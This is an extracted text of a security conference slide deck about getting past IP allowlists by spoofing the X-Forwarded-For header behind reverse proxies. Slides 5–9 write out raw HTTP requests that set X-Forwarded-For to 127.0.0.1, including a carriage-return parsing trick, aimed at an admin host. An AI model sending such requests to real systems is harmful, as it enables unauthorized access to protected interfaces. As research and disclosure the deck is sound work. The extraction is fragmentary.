Tweet
Tweet

Slide 1

Slide 1 text

At Home Among Strangers Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.

Slide 2

Slide 2 text

Reverse Proxy

Slide 3

Slide 3 text

No content

Slide 4

Slide 4 text

X-Forwarded-For: , X-Forwarded-For: , ,

Slide 5

Slide 5 text

HTTP-request GET / HTTP/1.1
 Host: admin.my.site
 Connection: close GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: ,

Slide 6

Slide 6 text

XFF/XRI Spoofing GET / HTTP/1.1
 Host: admin.my.site X-Forwarded-For: 127.0.0.1
 Connection: close GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: , ,

Slide 7

Slide 7 text

HTTP-request GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\n
 Connection: close\r\n \r\n X-Forwarded-For: , ,

Slide 8

Slide 8 text

HTTP-request with 0d GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n
 Connection: close\r\n \r\n X-Forwarded-For: \r, ,

Slide 9

Slide 9 text

XFF/XRI Spoofing+ GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n
 Connection: close\r\n \r\n GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: , , Tomcat? WebSphere?

Slide 10

Slide 10 text

Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn